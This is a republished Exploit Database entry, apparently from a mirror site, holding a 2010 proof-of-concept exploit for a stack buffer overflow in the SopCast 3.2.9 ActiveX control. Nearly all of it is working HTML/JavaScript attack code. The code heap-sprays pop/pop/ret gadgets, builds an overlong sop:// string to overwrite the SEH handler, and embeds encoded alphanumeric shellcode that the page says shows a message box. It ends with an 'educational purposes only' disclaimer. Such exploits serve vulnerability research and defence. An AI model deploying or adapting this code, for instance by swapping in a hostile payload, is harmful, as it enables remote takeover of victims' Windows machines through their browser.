SopCast 3.2.9 – Remote Command Execution

• Exploit Database
• 106 阅读

• 作者： sud0
  日期： 2010-08-10
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14600/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119

  <html> <Center> <H1>Sopcast POC by Sud0<br></H1> <b>Tested on XP SP3 EN on VBox with IE 7<br> Spraying a lot to get a nice unicode usable address 0x20260078<br> I sprayed with a set of P/P/R instructions to come back to the stack<br> ***Need internet connection on the box to trigger the vuln***<br> Wait for the Spray to finish (IE will seem freezed for some seconds)<br> The Sopcast control will be loaded and shown on the page<br> wait approx 3 to 5 seconds and a message box should appear<br> </b> </Center> <!-- # Exploit Title : SopCast BOF # Date: August 10, 2010 # Author: Sud0 # Bug found by: Sud0 # Software Link : http://www.sopcast.com - http://www.easetuner.com # Version : 3.2.9 # OS: Windows # Tested on : XP SP3 En (VirtualBox) Fully Patched, Internet Explorer 7 # Type of vuln: Stack Buffer Overflow - SEH # Advisory: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-059 # Big thanks to : my wife for supporting me # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/   |------------------------------------------------------------------| | __ __| | _________________/ /___ _____ / /________ _____ ___| |/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \ | | / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/| || | http://www.corelan.be:8800 | |security@corelan.be | || |-------------------------------------------------[ EIP Hunters ]--|   Script provided &apos;as is&apos;, without any warranty. Use for educational purposes only. Do not use this code to do anything illegal ! Corelan does not want anyone to use this script for malicious and/or illegal purposes Corelan cannot be held responsible for any illegal use.   Note : you are not allowed to edit/modify this code. If you do, Corelan cannot be held responsible for any damages this may cause.       -->   <object classid=&apos;clsid:8FEFF364-6A5F-4966-A917-A3AC28411659&apos; id=&apos;boom&apos; ></object> <script> // ######################################### Begin of spraying with (nops + Pop/Pop/Ret) instructions to come back to the stack   var nops = unescape("%49%41");// some nice nops on ECX var ppr = unescape("%49%58%49%58%49%c3");// Pop EAX / pop EAX / Ret var ppraddy = 0x20260078; var BlockSize = 0x200000; var BlockHeaderSize = 0x26; var PPRSize = 0x6; var nopSize = BlockSize - (PPRSize + BlockHeaderSize); var heapBlocks = (ppraddy+BlockSize*2)/(BlockSize*2); var Spray = new Array(); while (nops.length<nopSize) { nops += nops; } nops = nops.substring(0,nopSize); for (i=0;i<heapBlocks;i++) { Spray[i] = nops +ppr; } // ######################################### end of spraying   var buffSize = 522; // (516 + 6 = sop:// )offset to overwrite EIP var x="sop://"; while (x.length<buffSize) x += unescape("%41"); x+=unescape("%41"); x+=unescape("%41"); x+=unescape("%87");//low unicode bytes of seh destination address 0035 (0x20260087) x+=" ";//High unicode bytes of seh destination address 2026 (0x20260087) x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49"); x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A"); x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49"); x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%52%49%c3");   // some junk before shellcode for (i=0;i<330;i++) { x+=unescape("%41"); }   // messagebox shellcode x+="RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIA"; x+="IQI111AIAJQYAZBABABABABkMAGB9u4JBfyjK3kXYRTLdKDNQyBx2pzlqGYS4DKPqlpBkQfzl2kpvMLTKq6LH4KqnmP"; x+="TKMfNXNoLXrUL3Ny9qXQKOYQc0bkplo4nDrk15oLTKPTKUD8KQXj2kMzlX4K1JkpyqjK7sp7OY4KMdtKKQZNLqIomaw"; x+="PilVLRdWPBTlJ6a6olMJawWHil1YoKOKOmk3LKtMXSEgnRkojO4YqZK0fBkzlpKRkqJKlm1JKdKitRkkQxhe9oTLdML"; x+="31es6RKXKywdsY9UCYfbOx2npNZnzLpR8h5LkOKOkOQyQ5kT5kSNj8yRBSSWmLo4nrxhdKKOKOKOe9oUkXoxRLplMPK"; x+="O1XLsnRnNs41Xaet3REbRQx1LmTkZSYK6pVKOPULDqyWRPPWKSxg2Nm5lQwklktPRYXqN9okOYo38PlaQPnQH2HPCrO"; x+="2RqUNQ9KrhqLMTlG1yGsQXnPpXkpKp1XKpNs45s4OxQTmPOrQiQXpoOysDouQXMucHRPPllqWYrhPLktKaQy7qNQ6rN"; x+="rpSpQqBkOvpNQgPB0ioNuyxkZA";   // some junk after shellcode for (i=0;i<40000;i++) { x+=unescape("%41"); }   // calling the boom boom.ChannelName=x; // setting channel name boom.SetSopAddress(x); // getting address to trigger the boom   </script> </html>